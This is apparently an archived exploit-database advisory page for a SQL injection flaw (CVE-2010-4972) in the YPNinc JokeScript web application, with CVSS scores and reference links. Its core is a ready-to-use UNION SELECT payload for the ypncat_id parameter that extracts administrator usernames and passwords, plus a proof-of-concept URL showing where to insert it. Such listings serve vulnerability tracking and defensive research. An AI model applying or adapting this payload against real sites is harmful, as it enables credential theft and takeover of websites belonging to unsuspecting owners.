Bug: YPNinc JokeScript SQL Injection ( Ascii Version )

Search:
WLB2

YPNinc JokeScript SQL Injection

Published
Credit
Risk
2011.11.04
v3n0m
High
CWE
CVE
Local
Remote
CWE-89
CVE-2010-4972
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

-----------------------------------------------------------------------
YPNinc JokeScript (ypncat_id) SQL Injection Vulnerability
-----------------------------------------------------------------------
Author : v3n0m
Site : http://yogyacarderlink.web.id/
Date : June, 29-2010
Location : Jakarta, Indonesia
Time Zone : GMT +7:00
----------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : JokeScript
Vendor : http://www.ypninc.com/
Price : $89.95
----------------------------------------------------------------

Exploit:
~~~~~~~
-999+union+all+select+1,2,3,4,group_concat(ypnadmin_name,char(58),ypnadmin_pwd)v3n0m,6,7,8,9,10+from+ypnjks_admin--

Poc:
~~~~~~~

http://127.0.0.1/[path]/index.php?ypncat_id=[SQLi]

----------------------------------------------------------------

WWW.YOGYACARDERLINK.WEB.ID | v3n0m666[at]live[dot]com

---------------------------[EOF]--------------------------------

References:

http://xforce.iss.net/xforce/xfdb/59893
http://www.vupen.com/english/advisories/2010/1647
http://www.securityfocus.com/bid/41215
http://www.exploit-db.com/exploits/14107
http://secunia.com/advisories/40378
http://packetstormsecurity.org/1006-exploits/ypnincjokescript-sql.txt

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version